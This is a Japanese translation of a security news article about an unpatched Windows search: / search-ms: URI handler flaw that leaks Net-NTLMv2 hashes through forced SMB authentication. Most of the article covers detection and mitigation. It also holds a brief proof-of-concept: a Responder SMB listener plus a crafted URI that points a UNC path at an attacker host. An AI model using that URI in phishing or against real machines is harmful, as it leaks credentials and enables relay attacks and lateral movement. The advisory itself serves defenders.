Windowsシステムが再び、searchのURIハンドラの新たな悪用を通じてNTLM認証情報の漏洩にさらされています。この脆弱性クラスは、スニッピングツールで修正済みのCVE-2026-33829と非常によく似た手口です。
Windows SearchのURIハンドラの脆弱性
Huntressのセキュリティ研究者が明らかにしたところによると、WindowsのsearchのURIハンドラはユーザーが指定したパラメータを適切に処理しておらず、攻撃者がアウトバウンドSMB認証を強制的に引き起こすことが可能となっています。
細工したURIの中に悪意のあるUNCパスを埋め込むことで、攻撃者はシステムを攻撃者が管理するサーバーへのNTLM認証リクエストを自動的に開始させることができます。
この結果、Net-NTLMv2ハッシュが漏洩します。平文の認証情報ではないものの、NTLMリレー攻撃、オフラインのパスワードクラッキング、あるいは企業環境内での横方向移動に悪用される恐れがあります。重要な点として、この手法はマルウェアやエクスプロイトチェーンを一切必要とせず、ユーザーが一度クリックするだけで成立します。
この脆弱性は、WindowsがExplorerFrame.dllを通じてsearch: URIスキームを処理する方法、具体的にはSearchExecute COMクラス(CLSID: {90b9bce2-b6db-4fd3-8451-35917ea1081b})の実装に存在します。
search:とsearch-ms:の両URIハンドラは同じCOMアクティベーションパスを共有しているため、入力検証の弱点は両方のスキームに影響します。この共通実装により、複数のWindowsコンポーネントにわたって同様のNTLM漏洩が長期間にわたって観察されてきた理由が説明できます。
この問題を示す概念実証は次のとおりです。
- 攻撃者はResponderなどのツールを使い、管理下のシステム上にSMBリスナーを設定します。
- 被害者が次のような細工されたURIを実行またはクリックします: search:query=test&crumb=location:\attacker-ip\share
- WindowsがリモートのUNCパスへ自動的にアクセスを試みます。
- システムがNTLM認証を開始し、Net-NTLMv2ハッシュが攻撃者に漏洩します。
- 認証の試みが完了した後にのみ、ユーザーにエラーメッセージが表示されます。
注目すべきは、NTLMハッシュの漏洩は通常ユーザーセッションごとに1回のみ発生するため、最初のやり取りが攻撃者にとって極めて重要である点です。この挙動は、ms-screensketch: URIハンドラを同様の仕組みで悪用したCVE-2026-33829と非常によく一致しています。
両脆弱性は同じ根本原因、すなわち外部から供給されたパスの検証が不十分なことに起因しており、同一の認証情報漏洩という結果をもたらします。
これらの類似点にもかかわらず、新たに確認されたこの亜種にはCVEが割り当てられておらず、依然として未修正のままです。
Microsoftはケースバイケースのトリアージプロセスを理由に、この問題を修正の優先度が低いものとして分類しています。これは、脆弱性の追跡と修正をCVEの公開のみに依存している組織にとって、重大な盲点となります。
現実の攻撃シナリオという観点では、この問題は非常に実用性が高いといえます。脅威アクターは悪意のあるsearchリンクをフィッシングメールやWebコンテンツに埋め込み、ユーザーが一度クリックするだけで認証情報を漏洩させることができます。
ファイルのダウンロードやペイロードの実行は不要なため、ユーザーの疑念とセキュリティツールによる検出の両方を低減させます。認証の試みはバックグラウンドで静かに行われ、多くの場合、ユーザーが目視できるシステムの応答が現れるよりも前に完了しています。
セキュリティチームは、メールトラフィック、ブラウザのアクティビティ、プロキシログにおけるsearch:およびsearch-ms: URIスキームの不審な使用を監視する必要があります。
また、TCPポート445および139を介した、信頼されていない外部IPアドレスへのアウトバウンドSMB接続は、高リスクの指標として扱うべきです。社内システム以外への予期しないNTLM認証の試みも、悪用の兆候である可能性があります。
このクラスの脆弱性を緩和するために、組織はSMBトラフィックを明示的に必要としないエンドポイントからのアウトバウンドSMBトラフィックをブロックすることを優先すべきです。これにより、NTLMハッシュの漏洩を効果的に防ぐことができます。
SMB署名の強制によってリレー攻撃のリスクを低減できるほか、グループポリシーによるNTLM認証の制限または無効化はより広範な保護を提供しますが、レガシーシステムに影響を与える可能性があります。URIフィルタリングとネットワーク監視を通じたプロアクティブな検出も引き続き不可欠です。
この脆弱性は、企業セキュリティにおけるより広範な課題を浮き彫りにしています。CVEベースのパッチ適用だけでは、進化する脅威の手法に対応するには不十分なのです。
searchのURIハンドラの問題は、既知の脆弱性クラスが正式なトラッキングなしに異なるコンポーネント間にいかに存続し得るかを示しており、振る舞いベースの検出と多層的な防御制御の必要性を改めて強調するものです。
翻訳元: https://gbhackers.com/windows-search-uri-handler-vulnerability/
